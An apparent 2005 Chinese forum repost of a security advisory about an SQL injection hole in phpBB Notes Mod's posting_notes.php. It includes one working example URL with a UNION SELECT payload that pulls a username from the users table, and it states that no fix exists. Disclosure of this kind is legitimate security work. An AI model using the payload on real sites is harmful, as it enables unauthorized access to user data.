phpBB Notes Mod Input Validation Hole in 'posting_notes.php'

Home Home
登入註冊發表列印 載入圖片
引用 | 編輯 jenhaoliu
2005-05-03 13:15		 樓主
推文 x0
漏洞名稱: phpBB Notes Mod Input Validation Hole in 'posting_notes.php' Permits SQL Injection
漏洞編號: ICST-CA-2005-066
漏洞說明: phpBB Notes Mod中存在Input Validation漏洞,遠端使用者可以藉此執行SQL指令
底下是URL入侵範例
http://[target]/posting_notes.php?mode=editpost &p=-99%20UNION%20SELECT%200,0, username,0,0,0,0,0,0%20FROM%20orionphpbb_users%20WHERE%20user_id=2/*


影響平台: Linux
Unix
Windows

影響狀況: 遠端使用者可以在目標資料庫執行SQL指令

解決方案: 目前尚無解決方案

參考資料: phpBB Notes Mod Input Validation Hole in 'posting_notes.php' Permits SQL Injecti

獻花 x0